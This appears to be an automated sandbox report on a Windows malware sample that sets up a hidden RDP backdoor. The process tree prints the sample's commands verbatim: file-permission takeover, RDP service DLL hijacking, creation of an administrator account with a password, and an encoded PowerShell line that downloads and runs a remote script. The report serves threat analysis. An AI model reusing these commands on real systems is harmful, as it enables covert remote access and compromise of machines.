Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
17-11-2020 12:38
Static task
static1
Behavioral task
behavioral1
Sample
09fd827d8b404557a5c9e06810247c12.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
09fd827d8b404557a5c9e06810247c12.exe
Resource
win10v20201028
General
-
Target
09fd827d8b404557a5c9e06810247c12.exe
-
Size
3.4MB
-
MD5
afb57d5d065aaa204e8a5c6803bab72b
-
SHA1
5cd785582bba69f740a8943c02123e683a541b3b
-
SHA256
3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e
-
SHA512
40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blacklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 7 792 powershell.exe 9 792 powershell.exe 11 792 powershell.exe 12 792 powershell.exe 14 792 powershell.exe 16 792 powershell.exe 18 792 powershell.exe 20 792 powershell.exe 22 792 powershell.exe 24 792 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1188 icacls.exe 1720 icacls.exe 1740 icacls.exe 1300 takeown.exe 1204 icacls.exe 1580 icacls.exe 272 icacls.exe 1152 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1700 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1452 1452 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1300 takeown.exe 1204 icacls.exe 1580 icacls.exe 272 icacls.exe 1152 icacls.exe 1188 icacls.exe 1720 icacls.exe 1740 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 41 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49c17411-7f1b-4384-8238-b80005e0f10b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_901d3f56-9ba1-45b1-ae14-37782402b8cf powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1f2a41d6-691a-4033-ac73-9a2994f2aa56 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEC04.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarECE3.tmp powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEECF.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2661a184-3234-4dda-b4fd-49416db8d283 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEC05.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarECB2.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEE7A.tmp powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3050180b-c7a5-431a-a7ed-0b642343bd33 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEEBD.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEF00.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7114c748-7c42-4337-b7c8-6b60560282b9 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8fb28e17-f52f-4e85-b553-24c58867cceb powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEE8B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEECE.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c1d11fd5-8778-4be2-bd88-1e8754528638 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabECB1.tmp powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEEFF.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEE8C.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fc8f5aa1-773d-4914-b9e5-8949fe348541 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4897d70b-6551-49fb-98be-261295677ba5 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TarEE7B.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9f49f865-a3c6-4cf0-a3a3-fd1baa40b105 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IKEQ71LS3BFIOP4E5W09.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabECE2.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\CabEEBC.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 60 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\25\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0a1e608fdbcd601 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 1700 powershell.exe 792 powershell.exe 792 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 1452 1452 1452 1452 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1700 powershell.exe Token: SeRestorePrivilege 1580 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1184 WMIC.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeAuditPrivilege 1184 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1184 WMIC.exe Token: SeIncreaseQuotaPrivilege 1184 WMIC.exe Token: SeAuditPrivilege 1184 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1188 WMIC.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeAuditPrivilege 1188 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1188 WMIC.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeAuditPrivilege 1188 WMIC.exe Token: SeDebugPrivilege 792 powershell.exe -
Suspicious use of WriteProcessMemory 127 IoCs
Processes:
09fd827d8b404557a5c9e06810247c12.exepowershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1960 wrote to memory of 1700 1960 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 1960 wrote to memory of 1700 1960 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 1960 wrote to memory of 1700 1960 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 1960 wrote to memory of 1700 1960 09fd827d8b404557a5c9e06810247c12.exe powershell.exe PID 1700 wrote to memory of 1660 1700 powershell.exe csc.exe PID 1700 wrote to memory of 1660 1700 powershell.exe csc.exe PID 1700 wrote to memory of 1660 1700 powershell.exe csc.exe PID 1660 wrote to memory of 1844 1660 csc.exe cvtres.exe PID 1660 wrote to memory of 1844 1660 csc.exe cvtres.exe PID 1660 wrote to memory of 1844 1660 csc.exe cvtres.exe PID 1700 wrote to memory of 1300 1700 powershell.exe takeown.exe PID 1700 wrote to memory of 1300 1700 powershell.exe takeown.exe PID 1700 wrote to memory of 1300 1700 powershell.exe takeown.exe PID 1700 wrote to memory of 1204 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1204 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1204 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1580 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1580 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1580 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 272 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 272 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 272 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1152 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1152 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1152 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1188 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1188 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1188 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1720 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1720 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1720 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1740 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1740 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1740 1700 powershell.exe icacls.exe PID 1700 wrote to memory of 1596 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1596 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1596 1700 powershell.exe reg.exe PID 1700 wrote to memory of 340 1700 powershell.exe reg.exe PID 1700 wrote to memory of 340 1700 powershell.exe reg.exe PID 1700 wrote to memory of 340 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1644 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1644 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1644 1700 powershell.exe reg.exe PID 1700 wrote to memory of 1520 1700 powershell.exe net.exe PID 1700 wrote to memory of 1520 1700 powershell.exe net.exe PID 1700 wrote to memory of 1520 1700 powershell.exe net.exe PID 1520 wrote to memory of 1088 1520 net.exe net1.exe PID 1520 wrote to memory of 1088 1520 net.exe net1.exe PID 1520 wrote to memory of 1088 1520 net.exe net1.exe PID 1700 wrote to memory of 1684 1700 powershell.exe cmd.exe PID 1700 wrote to memory of 1684 1700 powershell.exe cmd.exe PID 1700 wrote to memory of 1684 1700 powershell.exe cmd.exe PID 1684 wrote to memory of 1672 1684 cmd.exe cmd.exe PID 1684 wrote to memory of 1672 1684 cmd.exe cmd.exe PID 1684 wrote to memory of 1672 1684 cmd.exe cmd.exe PID 1672 wrote to memory of 1636 1672 cmd.exe net.exe PID 1672 wrote to memory of 1636 1672 cmd.exe net.exe PID 1672 wrote to memory of 1636 1672 cmd.exe net.exe PID 1636 wrote to memory of 572 1636 net.exe net1.exe PID 1636 wrote to memory of 572 1636 net.exe net1.exe PID 1636 wrote to memory of 572 1636 net.exe net1.exe PID 1700 wrote to memory of 528 1700 powershell.exe cmd.exe PID 1700 wrote to memory of 528 1700 powershell.exe cmd.exe PID 1700 wrote to memory of 528 1700 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yhohqbpl\yhohqbpl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES63B2.tmp" "c:\Users\Admin\AppData\Local\Temp\yhohqbpl\CSC29A543AFC00E4EA59E5227AB87A5CD7.TMP"4⤵
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
-
C:\Windows\system32\net.exenet start TermService5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin Ghasar4f5 /del1⤵
-
C:\Windows\system32\net.exenet.exe user updwin Ghasar4f5 /del2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin Ghasar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aq7RmA6J /add1⤵
-
C:\Windows\system32\net.exenet.exe user updwin aq7RmA6J /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aq7RmA6J /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" updwin /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" updwin /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user updwin aq7RmA6J1⤵
-
C:\Windows\system32\net.exenet.exe user updwin aq7RmA6J2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user updwin aq7RmA6J3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
